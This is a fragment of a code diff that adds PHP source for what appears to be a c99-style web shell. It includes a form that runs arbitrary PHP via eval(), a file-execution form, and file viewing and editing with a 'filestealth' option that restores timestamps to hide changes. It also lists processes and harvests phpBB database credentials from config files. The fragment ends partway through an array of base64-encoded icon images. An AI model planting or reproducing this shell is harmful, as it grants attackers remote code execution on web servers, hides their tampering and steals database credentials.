+      while (ereg("  ",$ret)) { $ret = str_replace("  "," ",$ret); }
+      while (ereg("=",$ret)) { $ret = str_replace("=","",$ret); }
+      $ret = convert_cyr_string($ret,"d","w");
+      $stack = explode("\n",$ret);
+      unset($stack[0],$stack[2]);
+      $stack = array_values($stack);
+      $stack[0]=str_replace("Image Name","ImageName",$stack[0]);
+      $stack[0]=str_replace("Session Name","SessionName",$stack[0]);
+      $stack[0]=str_replace("Mem Usage","MemoryUsage",$stack[0]);
+      $head = explode(" ",$stack[0]);
+      $stack = array_slice($stack,1);
+      $head = array_values($head);
+      if ($parsesort[1] != "a") { $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" border=\"0\"></a>"; }
+      else { $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" border=\"0\"></a>"; }
+      if ($k > count($head)) {$k = count($head)-1;}
+      for($i=0;$i<count($head);$i++) {
+        if ($i != $k) { $head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".trim($head[$i])."</b></a>"; }
+      }
+      $prcs = array();
+      unset($stack[0]);
+      foreach ($stack as $line) {
+        if (!empty($line)) {
+          $line = explode(" ",$line);
+          $line[4] = str_replace(".","",$line[4]);
+          $line[4] = intval($line[4]) * 1024;
+          unset($line[5]);
+          $prcs[] = $line;
+        }
+      }
+    }
+    $head[$k] = "<b>".$head[$k]."</b>".$y;
+    $v = $processes_sort[0];
+    usort($prcs,"tabsort");
+    if ($processes_sort[1] == "d") { $prcs = array_reverse($prcs); }
+    $tab = array();
+    $tab[] = $head;
+    $tab = array_merge($tab,$prcs);
+    echo "<table class=explorer>\n";
+    foreach($tab as $i=>$k) {
+      echo "<tr>";
+      foreach($k as $j=>$v) {
+        if ($win and $i > 0 and $j == 4) { $v = view_size($v); }
+        echo "<td>".$v."</td>";
+      }
+      echo "</tr>\n";
+    }
+    echo "</table>";
+  }
+}
+if ($act == "eval") {
+  if (!empty($eval)) {
+    echo "Result of execution this PHP-code:<br>";
+    $tmp = @ob_get_contents();
+    $olddir = realpath(".");
+    @chdir($d);
+    if ($tmp) {
+      @ob_clean();
+      eval($eval);
+      $ret = @ob_get_contents();
+      $ret = convert_cyr_string($ret,"d","w");
+      @ob_clean();
+      echo $tmp;
+      if ($eval_txt) {
+        $rows = count(explode("\r\n",$ret))+1;
+        if ($rows < 10) {$rows = 10;}
+        echo "<br><textarea cols=\"115\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
+      }
+      else {echo $ret."<br>";}
+    }
+    else {
+      if ($eval_txt) {
+        echo "<br><textarea cols=\"115\" rows=\"15\" readonly>";
+        eval($eval);
+        echo "</textarea>";
+      }
+      else {echo $ret;}
+    }
+    @chdir($olddir);
+  }
+  else {echo "<b>PHP-code Execution (Use without PHP Braces!)</b>"; if (empty($eval_txt)) {$eval_txt = TRUE;}}
+  echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=eval><textarea name=\"eval\" cols=\"115\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "></form>";
+}
+if ($act == "f") {
+  echo "<div align=left>";
+  if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit") {
+    if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";}
+    else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a></center>";}
+  }
+  else {
+    $r = @file_get_contents($d.$f);
+    $ext = explode(".",$f);
+    $c = count($ext)-1;
+    $ext = $ext[$c];
+    $ext = strtolower($ext);
+    $rft = "";
+    foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}}
+    if (eregi("sess_(.*)",$f)) {$rft = "phpsess";}
+    if (empty($ft)) {$ft = $rft;}
+    $arr = array(
+        array("<img src=\"".$surl."act=img&img=ext_diz\" border=\"0\">","info"),
+        array("<img src=\"".$surl."act=img&img=ext_html\" border=\"0\">","html"),
+        array("<img src=\"".$surl."act=img&img=ext_txt\" border=\"0\">","txt"),
+        array("Code","code"),
+        array("Session","phpsess"),
+        array("<img src=\"".$surl."act=img&img=ext_exe\" border=\"0\">","exe"),
+        array("SDB","sdb"),
+        array("<img src=\"".$surl."act=img&img=ext_gif\" border=\"0\">","img"),
+        array("<img src=\"".$surl."act=img&img=ext_ini\" border=\"0\">","ini"),
+        array("<img src=\"".$surl."act=img&img=download\" border=\"0\">","download"),
+        array("<img src=\"".$surl."act=img&img=ext_rtf\" border=\"0\">","notepad"),
+        array("<img src=\"".$surl."act=img&img=change\" border=\"0\">","edit")
+    );
+    echo "<b>Viewing file:&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;".$f." (".view_size(filesize($d.$f)).") &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".view_perms_color($d.$f)."</b><br>Select action/file-type:<br>";
+    foreach($arr as $t) {
+      if ($t[1] == $rft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><font color=green>".$t[0]."</font></a>";}
+      elseif ($t[1] == $ft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b><u>".$t[0]."</u></b></a>";}
+      else {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b>".$t[0]."</b></a>";}
+      echo " (<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&white=1&d=".urlencode($d)."\" target=\"_blank\">+</a>) |";
+    }
+    echo "<hr size=\"1\" noshade>";
+    if ($ft == "info") {
+      echo "<b>Information:</b><table border=0 cellspacing=1 cellpadding=2><tr><td><b>Path</b></td><td> ".$d.$f."</td></tr><tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr><tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>";
+      if (!$win) {
+        echo "<tr><td><b>Owner/Group</b></td><td> ";
+        $ow = posix_getpwuid(fileowner($d.$f));
+        $gr = posix_getgrgid(filegroup($d.$f));
+        echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f));
+      }
+      echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&f=".urlencode($f)."&d=".urlencode($d)."\">".view_perms_color($d.$f)."</a></td></tr><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr></table>";
+      $fi = fopen($d.$f,"rb");
+      if ($fi) {
+        if ($fullhexdump) {echo "<b>FULL HEXDUMP</b>"; $str = fread($fi,filesize($d.$f));}
+        else {echo "<b>HEXDUMP PREVIEW</b>"; $str = fread($fi,$hexdump_lines*$hexdump_rows);}
+        $n = 0;
+        $a0 = "00000000<br>";
+        $a1 = "";
+        $a2 = "";
+        for ($i=0; $i<strlen($str); $i++) {
+          $a1 .= sprintf("%02X",ord($str[$i]))." ";
+          switch (ord($str[$i])) {
+            case 0:  $a2 .= "<font>0</font>"; break;
+            case 32:
+            case 10:
+            case 13: $a2 .= "&nbsp;"; break;
+            default: $a2 .= htmlspecialchars($str[$i]);
+          }
+          $n++;
+          if ($n == $hexdump_rows) {
+            $n = 0;
+            if ($i+1 < strlen($str)) {$a0 .= sprintf("%08X",$i+1)."<br>";}
+            $a1 .= "<br>";
+            $a2 .= "<br>";
+          }
+        }
+        echo "<table border=1 bgcolor=#666666>".
+             "<tr><td bgcolor=#666666>".$a0."</td>".
+             "<td bgcolor=#000000>".$a1."</td>".
+             "<td bgcolor=#000000>".$a2."</td>".
+             "</tr></table><br>";
+      }
+      $encoded = "";
+      if ($base64 == 1) {
+        echo "<b>Base64 Encode</b><br>";
+        $encoded = base64_encode(file_get_contents($d.$f));
+      }
+      elseif($base64 == 2) {
+        echo "<b>Base64 Encode + Chunk</b><br>";
+        $encoded = chunk_split(base64_encode(file_get_contents($d.$f)));
+      }
+      elseif($base64 == 3) {
+        echo "<b>Base64 Encode + Chunk + Quotes</b><br>";
+        $encoded = base64_encode(file_get_contents($d.$f));
+        $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2);
+      }
+      elseif($base64 == 4) {
+        $text = file_get_contents($d.$f);
+        $encoded = base64_decode($text);
+        echo "<b>Base64 Decode";
+    if (base64_encode($encoded) != $text) {echo " (failed)";}
+    echo "</b><br>";
+   }
+   if (!empty($encoded))
+   {
+    echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>";
+   }
+   echo "<b>HEXDUMP:</b><nobr> [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br><b>Base64: </b>
+        <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>]&nbsp;</nobr>
+        <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>]&nbsp;</nobr>
+        <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a>]&nbsp;</nobr>
+        <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>]&nbsp;</nobr>
+        <P>";
+  }
+  elseif ($ft == "html") {
+   if ($white) {@ob_clean();}
+   echo $r;
+   if ($white) {dQ99shexit();}
+  }
+  elseif ($ft == "txt") {echo "<pre>".htmlspecialchars($r)."</pre>";}
+  elseif ($ft == "ini") {echo "<pre>"; var_dump(parse_ini_file($d.$f,TRUE)); echo "</pre>";}
+  elseif ($ft == "phpsess") {
+   echo "<pre>";
+   $v = explode("|",$r);
+   echo $v[0]."<br>";
+   var_dump(unserialize($v[1]));
+   echo "</pre>";
+  }
+  elseif ($ft == "exe") {
+   $ext = explode(".",$f);
+   $c = count($ext)-1;
+   $ext = $ext[$c];
+   $ext = strtolower($ext);
+   $rft = "";
+   foreach($exeftypes as $k=>$v)
+   {
+    if (in_array($ext,$v)) {$rft = $k; break;}
+   }
+   $cmd = str_replace("%f%",$f,$rft);
+   echo "<b>Execute file:</b><form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><input type=\"text\" name=\"cmd\" value=\"".htmlspecialchars($cmd)."\" size=\"".(strlen($cmd)+2)."\"><br>Display in text-area<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\" checked><input type=hidden name=\"d\" value=\"".htmlspecialchars($d)."\"><br><input type=submit name=submit value=\"Execute\"></form>";
+  }
+  elseif ($ft == "sdb") {echo "<pre>"; var_dump(unserialize(base64_decode($r))); echo "</pre>";}
+  elseif ($ft == "code") {
+    if (ereg("php"."BB 2.(.*) auto-generated config file",$r)) {
+      $arr = explode("\n",$r);
+      if (count($arr == 18)) {
+        include($d.$f);
+        echo "<b>phpBB configuration is detected in this file!<br>";
+        if ($dbms == "mysql4") {$dbms = "mysql";}
+        if ($dbms == "mysql") {echo "<a href=\"".$surl."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."&sql_port=3306&sql_db=".htmlspecialchars($dbname)."\"><b><u>Connect to DB</u></b></a><br><br>";}
+        else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by ".$sh_name.". Please, report us for fix.";}
+        echo "Parameters for manual connect:<br>";
+        $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd);
+        foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";}
+        echo "</b><hr size=\"1\" noshade>";
+      }
+    }
+    echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: ".$highlight_background .";\">";
+    if (!empty($white)) {@ob_clean();}
+    highlight_file($d.$f);
+    if (!empty($white)) {dQ99shexit();}
+    echo "</div>";
+  }
+  elseif ($ft == "download") {
+    @ob_clean();
+    header("Content-type: application/octet-stream");
+    header("Content-length: ".filesize($d.$f));
+    header("Content-disposition: attachment; filename=\"".$f."\";");
+    echo $r;
+    exit;
+  }
+  elseif ($ft == "notepad") {
+    @ob_clean();
+    header("Content-type: text/plain");
+    header("Content-disposition: attachment; filename=\"".$f.".txt\";");
+    echo($r);
+    exit;
+  }
+  elseif ($ft == "img") {
+    $inf = getimagesize($d.$f);
+    if (!$white) {
+      if (empty($imgsize)) {$imgsize = 20;}
+      $width = $inf[0]/100*$imgsize;
+      $height = $inf[1]/100*$imgsize;
+      echo "<center><b>Size:</b>&nbsp;";
+      $sizes = array("100","50","20");
+      foreach ($sizes as $v) {
+        echo "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=img&d=".urlencode($d)."&imgsize=".$v."\">";
+        if ($imgsize != $v ) {echo $v;}
+        else {echo "<u>".$v."</u>";}
+        echo "</a>&nbsp;&nbsp;&nbsp;";
+      }
+      echo "<br><br><img src=\"".$surl."act=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\" width=\"".$width."\" height=\"".$height."\" border=\"1\"></center>";
+    }
+    else {
+      @ob_clean();
+      $ext = explode($f,".");
+      $ext = $ext[count($ext)-1];
+      header("Content-type: ".$inf["mime"]);
+      readfile($d.$f);
+      exit;
+    }
+  }
+  elseif ($ft == "edit") {
+   if (!empty($submit))
+   {
+    if ($filestealth) {$stat = stat($d.$f);}
+    $fp = fopen($d.$f,"w");
+    if (!$fp) {echo "<b>Can't write to file!</b>";}
+    else
+    {
+     echo "<b>Saved!</b>";
+     fwrite($fp,$edit_text);
+     fclose($fp);
+     if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);}
+     $r = $edit_text;
+    }
+   }
+   $rows = count(explode("\r\n",$r));
+   if ($rows < 10) {$rows = 10;}
+   if ($rows > 30) {$rows = 30;}
+   echo "<form action=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."\" method=POST><input type=submit name=submit value=\"Save\">&nbsp;<input type=\"reset\" value=\"Reset\">&nbsp;<input type=\"button\" onclick=\"location.href='".addslashes($surl."act=ls&d=".substr($d,0,-1))."';\" value=\"Back\"><br><textarea name=\"edit_text\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>";
+  }
+  elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";}
+  else {echo "<center><b>Unknown file type (".$ext."), please select type manually.</b></center>";}
+}
+echo "</div>\n";
+}
+}
+else {
+@ob_clean();
+$images = array(
+"arrow_ltr"=>
+"R0lGODlhJgAWAIABAP///wAAACH5BAHoAwEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQ".
+"SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==",
+"back"=>
+"R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".
+"aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt".
+"Wg0JADs=",
+"buffer"=>
+"R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo".
+"eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGdQChg+xhnRB+ptLOhai1crEmD".
+"Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==",
+"change"=>
+"R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+".
+"/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA".
+"AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC".
+"wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA".
+"CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL".
+"zMshADs=",
+"delete"=>
+"R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1dQ19cwXOfDw8Kenp/n5+etgeunp".
+"6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9dQ7djcscSM93d3ZGRkeEsTevd4LCw".
+"sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv".
+"vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42Vl".
+"ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5".
+"BAEAAFkALAAAAAAUABQAAAesgFmCg4SFhoeIhiUfIImIMlgQB46GLAlYQkaFVVhSAIZLT5cbEYI4".
+"STo5MxOfhQwBA1gYChckQBk1OwiIALACLkgxJilTBI69RFhDFh4HDJRZVFgPPFBR0FkNWDdMHA8G".
+"BZTaMCISVgMC4IkVWCcaPSi96OqGNFhKI04dgr0QWFcKDL3A4uOIjVZZABxQIWDBLkIEQrRoQsHQ".
+"jwVFHBgiEGQFIgQasYkcSbJQIAA7",
+"download"=>
+"R0lGODlhFAAUALMIAAD/AACAAIAAAMDAwH9/f/8AAP///wAAAP///wAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAgALAAAAAAUABQAAAROEMlJq704UyGOvkLhfVU4kpOJSpx5nF9YiCtLf0SuH7pu".
+"EYOgcBgkwAiGpHKZzB2JxADASQFCidQJsMfdGqsDJnOQlXTP38przWbX3qgIADs=",
+"forward"=>
+"R0lGODlhFAAUAPIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".
+"aLrc/jDK2Qp9xV5WiN5G50FZaRLD6IhE66Lpt3RDbd9CQFSE4P++QW7He7UKPh0IqVw2l0RQSEqt".
+"WqsJADs=",
+"home"=>
+"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS".
+"krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j".
+"VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=",
+"mode"=>
+"R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9dQ////wAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO".
+"2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/".
+"dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=",
+"search"=>
+"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9dQ01NTSkpKQQEBP//".
+"/wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOap".
+"s5IKQccz8XgK4EGgQqWMvkrSscylhoaFVmuZLgUDAnZxEBMODSnrkhiSCZ4CGrUWMA+LLDxuSHsD".
+"AkN4C3sfBX10VHaBJ4QfA4eIU4pijQcFmCVoNkFlggcMRScNSUCdJyhoDasNZ5MTDVsXBwlviRmr".
+"Cbq7C6sIrqawrKwTv68iyA6rDhEAOw==",
+"setup"=>
+"R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9dQ01NTUJC".
+"QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".
+"ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB".
+"qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE".
+"OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==",
+"small_dir"=>
+"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp".
+"/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=",
+"small_unk"=>
+"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAIep3BE9mllic3B5iVpjdMvh/MLc+y1U".
+"p9Pm/GVufc7j/MzV/9Xm/EOm99bn/Njp/a7Q+tTm/LHS+eXw/t3r/Nnp/djo/Nrq/fj7/9vq/Nfo".
+"/Mbe+8rh/Mng+7jW+rvY+r7Z+7XR9dDk/NHk/NLl/LTU+rnX+8zi/LbV++dQ/e72/vH3/vL4/u31".
+"/e31/uDu/dzr/Orz/eHu/dQ6/vH4/v////v+/3ez6vf7//T5/kGS4Pv9/7XV+rHT+r/b+rza+vP4".
+"/uz0/urz/u71/uvz/dTn/M/k/N3s/dvr/cjg+8Pd+8Hc+sff+8Te+/D2/rXI8rHF8brM87fJ8nmP".
+"wr3N86/D8KvB8F9neEFotEBntENptENptSxUpx1IoDlfrTRcrZeeyZacxpmhzIuRtpWZxIuOuKqz".
+"9ZOWwX6Is3WIu5im07rJ9J2t2Zek0m57rpqo1nKCtUVrtYir3vf6/46v4Yuu4WZvfr7P6sPS6sDQ".
+"66XB6cjZ8a/K79/s/dbn/ezz/czd9mN0jKTB6ai/76W97niXz2GCwV6AwUdstXyVyGSDwnmYz4io".
+"24Oi1a3B45Sy4ae944Ccz4Sj1n2GlgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAjnACtVCkCw4JxJAQQqFBjAxo0MNGqsABQAh6CFA3nk0MHiRREVDhzsoLQwAJ0gT4ToecSHAYMz".
+"aQgoDNCCSB4EAnImCiSBjUyGLobgXBTpkAA5I6pgmSkDz5cuMSz8yWlAyoCZFGb4SQKhASMBXJpM".
+"uSrQEQwkGjYkQCTAy6AlUMhWklQBw4MEhgSA6XPgRxS5ii40KLFgi4BGTEKAsCKXihESCzrsgSQC".
+"yIkUV+SqOYLCA4csAup86OGDkNw4BpQ4OaBFgB0TEyIUKqDwTRs4a9yMCSOmDBoyZu4sJKCgwIDj".
+"yAsokBkQADs=",
+"multipage"=>"R0lGODlhCgAMAJEDAP/////3mQAAAAAAACH5BAEAAAMALAAAAAAKAAwAAAIj3IR".
+"pJhCODnovidAovBdMzzkixlXdlI2oZpJWEsSywLzRUAAAOw==",
+"sort_asc"=>
+"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMa".
+"SLrcPcE9GKUaQlQ5sN5PloFLJ35OoK6q5SYAOw==",
+"sort_desc"=>
+"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMb".
+"SLrcOjBCB4UVITgyLt5ch2mgSJZDBi7p6hIJADs=",
+"sql_button_drop"=>
+"R0lGODlhCQALAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
+"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
+"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
+"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
+"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
+"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
+"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
+"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
+"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
+"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
+"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
+"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".
+"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAsA".
+"AAg4AP8JREFQ4D+CCBOi4MawITeFCg/iQhEPxcSBlFCoQ5dQ4MSKv1BgRGGMo0iJFC2ehHjSoMt/".
+"AQEAOw==",
+"sql_button_empty"=>
+"R0lGODlhCQAKAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
+"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
+"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
+"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
+"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
